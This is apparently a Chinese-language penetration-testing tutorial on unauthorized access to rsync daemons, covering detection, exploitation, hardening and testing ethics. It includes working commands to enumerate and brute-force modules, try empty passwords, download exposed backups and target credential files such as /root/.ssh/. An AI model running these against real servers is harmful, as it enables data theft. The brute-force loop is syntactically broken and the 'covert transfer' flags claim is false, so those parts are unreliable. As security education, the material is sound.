rsync未授权访问漏洞分析与防御实践

1. 漏洞背景与风险认知

rsync作为类Unix系统下的远程数据同步工具，凭借其增量传输算法和高效的同步能力，在企业文件备份、网站内容分发等场景广泛应用。但许多管理员在部署时往往忽视其默认配置的安全隐患——当服务以daemon模式运行时，若未正确配置访问控制，攻击者可能直接获取服务器完整目录列表甚至任意文件下载权限。

去年某次企业安全评估中，我们曾发现某云服务商的备份服务器因rsync未授权访问漏洞导致7TB客户数据暴露。攻击者仅需一条命令就能拉取整个业务数据库的备份文件，这种案例在实战中绝非个例。

2. 漏洞检测方法论

2.1 基础探测手法

使用nmap进行服务识别是最快的方式：

bash复制nmap -p 873 --script rsync-list-modules <target_ip>

若返回结果包含shared folder字样且未显示认证要求，则存在未授权访问风险。更直观的验证是直接尝试列出目录：

bash复制rsync rsync://<target_ip>/

2.2 深度检测技巧

1. 模块枚举：有些配置会隐藏默认模块名，尝试用常见名称爆破：

   bash复制for module in $(wordlist.txt); do rsync --list-only rsync://$IP/$module; done
   

2. 权限测试：即使需要密码，尝试空密码或弱密码组合：

   bash复制rsync --password-file=empty.txt rsync://user@ip/share
   

3. 漏洞利用实战

3.1 信息收集阶段

获取可用模块列表后，先确认可访问范围：

bash复制rsync -av --list-only rsync://192.168.1.100/web_backup

特别注意包含db_dump、config等关键词的目录。

3.2 数据下载操作

完整下载暴露目录（注意流量特征）：

bash复制rsync -avz rsync://192.168.1.100/web_backup /local/path

如需隐蔽传输，添加--progress --size-only参数控制传输行为。

3.3 敏感文件定位技巧

优先检查以下路径：

• /etc/passwd
• /root/.ssh/
• *.sql.gz备份文件
• web.config等配置文件

4. 防御加固方案

4.1 基础安全配置

1. 修改/etc/rsyncd.conf强制认证：

   code复制auth users = admin
   secrets file = /etc/rsyncd.secrets
   

2. 限制访问IP：

   code复制hosts allow = 192.168.1.0/24
   

4.2 网络层防护

• 防火墙设置873端口白名单
• 使用SSH隧道加密传输：

  bash复制rsync -avz -e "ssh -p 2222" /local admin@remote:/backup
  

4.3 监控与审计

1. 日志分析关键词：

   code复制grep -E 'rsync.*connect' /var/log/secure
   

2. 使用fail2ban防御爆破行为

5. 渗透测试注意事项

1. 法律边界：务必取得书面授权，企业内网测试也需审批
2. 操作克制：禁止修改/删除目标文件，下载数据需加密存储
3. 痕迹清理：避免在目标服务器留下/tmp/目录下的缓存文件

某次金融行业测试中，我们通过rsync漏洞获取到数据库备份后立即停止操作，并发现该备份包含明文信用卡信息。根据保密协议，所有测试数据在报告提交后立即物理销毁。